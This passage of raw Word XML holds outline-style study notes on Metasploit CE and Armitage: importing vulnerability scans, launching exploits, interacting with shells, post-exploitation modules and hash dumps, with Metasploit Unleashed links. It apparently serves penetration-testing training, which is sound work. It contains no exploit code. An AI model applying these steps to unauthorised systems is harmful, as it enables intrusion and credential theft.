    <w:p w14:paraId="6A6B4B10" w14:textId="618FBC93" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242322F" w14:textId="73E155A5" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269FA1F7" w14:textId="06DD12BB" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A244AE6" w14:textId="34CF1108" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD357A" w14:textId="045BBB56" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Importing Scan Results from Nessus, Nexpose, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E83FE" w14:textId="5F42BCBA" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">open Nessus </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://127.0.0.1:8834</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0754FDBB" w14:textId="7D29BCC1" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scan </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B2DD3" w14:textId="5E2EF9F8" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B388898" w14:textId="2509F8AC" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Download and Save Report Locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A95B10F" w14:textId="4479AB86" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In MSF CE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB60D5F" w14:textId="262E73E3" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20926C" w14:textId="1A04F6D9" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Import </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Browse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EA405" w14:textId="4C2DCF37" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Import Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14733BC3" w14:textId="111551DD" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2461A" w14:textId="04BA286E" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A652F16" w14:textId="1F752E2F" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In MSF CE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ADB2DD" w14:textId="16F89B29" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Administration </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Global Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAF23A" w14:textId="715A2DED" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configure NeXpose Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA0C4BA" w14:textId="4E77E8F4" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930BF4A" w14:textId="1B355E37" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>3780</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CDB1C4" w14:textId="76CC4BDC" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16873434" w14:textId="56C318C2" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599B7BA" w14:textId="6D797BF7" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895AA17" w14:textId="77F58293" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analysis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F3E16" w14:textId="4166191F" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DEA4BD" w14:textId="6835AAC7" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE580DD" w14:textId="214C353A" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Module Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A2A480" w14:textId="06451618" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set Options and Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D5D9A" w14:textId="1D8F1E39" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16873C03" w14:textId="591FD49A" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>interact with successful shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43625202" w14:textId="133B9124" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BBF1C" w14:textId="58B6C765" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C4D39" w14:textId="2A3601C6" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Options and Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EECDDC" w14:textId="0322DB28" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARMITAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E31B8" w14:textId="4E557C62" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Java-based GUI for MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40919C56" w14:textId="54691CD8" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Armitage Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8474A4" w14:textId="50B2F270" w:rsidR="00916107" w:rsidRDefault="00916107" w:rsidP="00916107">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Included in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0B91C5" w14:textId="62C39D21" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Starting Metasploit Framework in Kali Linux 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FEE88" w14:textId="79045043" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35880484" w14:textId="2F271060" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ABF471" w14:textId="2347DE65" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF190E7" w14:textId="1C93385D" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Armitage Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5FF28" w14:textId="3634A81B" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Expand module tree and click on preferred scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D21EC4D" w14:textId="0B5986EC" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499C535" w14:textId="627490AF" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF6537" w14:textId="5F5C7BD9" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Right-click discovered hosts and select Services to open tab displaying all services scanned on target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A081190" w14:textId="04B8199F" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Armitage Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BB9A5E" w14:textId="5DF08928" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select Host to attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCABEDC" w14:textId="54F82E0B" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>find exploit in tree and double click to bring up config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B4306" w14:textId="2C3F846E" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC82C6E" w14:textId="272B6334" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Right-Click host after successful to view new additional options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468994C3" w14:textId="55686385" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>such as hash dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BEC06E" w14:textId="7CFD1532" w:rsidR="00DD0AFE" w:rsidRDefault="00DD0AFE" w:rsidP="00DD0AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F7AE00" w14:textId="3A9AE101" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Armitage Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B6BACE" w14:textId="5421B413" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>post-exploitation module – Launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08475729" w14:textId="07742234" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>POST MODULE REFERENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D50DAC4" w14:textId="09ED642E" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C171251" w14:textId="002A46FC" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/windows-post-capture-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A0385E8" w14:textId="483D93BD" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6793BB65" w14:textId="4D330330" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F638E10" w14:textId="0AF862CE" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F322DE" w14:textId="3976B20F" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/linux-post-gather-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7011CCDA" w14:textId="094025B0" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OS X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF28DDA" w14:textId="7B269027" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/os-post-gather-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31A73898" w14:textId="12281569" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Multiple OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CA2201" w14:textId="748BC747" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/multiple-os-post-gather-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7260BE7F" w14:textId="186E7D4E" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
